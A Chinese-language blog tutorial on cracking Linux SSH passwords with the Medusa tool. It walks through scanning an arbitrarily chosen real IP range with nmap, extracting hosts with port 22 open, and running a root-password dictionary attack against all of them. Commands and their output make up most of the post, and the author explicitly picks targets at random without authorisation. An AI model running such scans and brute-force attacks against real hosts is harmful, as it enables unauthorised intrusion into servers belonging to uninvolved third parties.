利用medusa破解linux ssh密碼

From 一不當心高潮了'blog

蛋疼，隨手寫一下，medusa破解起來仍是比較快的，首先咱們看看幫助

root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [NUM] : Resume scan from host #

ok，咱們看看medusa有哪些模塊支持什麼功能的破解

root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ ncp.mod : Brute force module for NCP sessions : version 1.0.0
+ nntp.mod : Brute force module for NNTP sessions : version 1.0.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.2
+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ svn.mod : Brute force module for Subversion sessions : version 1.0.0
+ telnet.mod : Brute force module for telnet sessions : version 1.2.2
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 1.0.0
+ wrapper.mod : Generic Wrapper Module : version 1.0.1

恩，咱們要破解ssh，因此用-M ssh參數加載ssh模塊，後面不用跟.mod

首先咱們肯定目標，掃描開放ssh的機器，隨便找個段掃描一下吧

root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

而後是漫長的等待，上面的參數掃描意思是，掃描整個段開了22端口的機器，而且判斷服務版本，保存到ssh文件中。

而後咱們查看掃描結果

root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 69.163.190.0/24

Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.13 (alt-malware.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
相似這樣的，這裏咱們要整理一下，把開了ssh的IP整理出來，如今明白oG保存的意義所在了

root@perl-exploit:/pentest# grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt

這條命令裏用到了cut，詳細用法爲就不羅嗦了。查看結果

root@perl-exploit:/pentest# cat ssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
變成這樣的了，接下來，咱們開始隨便找個字典，開始破解ssh密碼

root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh

root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: postgres (5 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: webmin (6 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: fuckyou (7 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
ok，等吧，這段時間你能夠那啥一下，或者找個那啥片那啥一下，結果最後會自動顯示。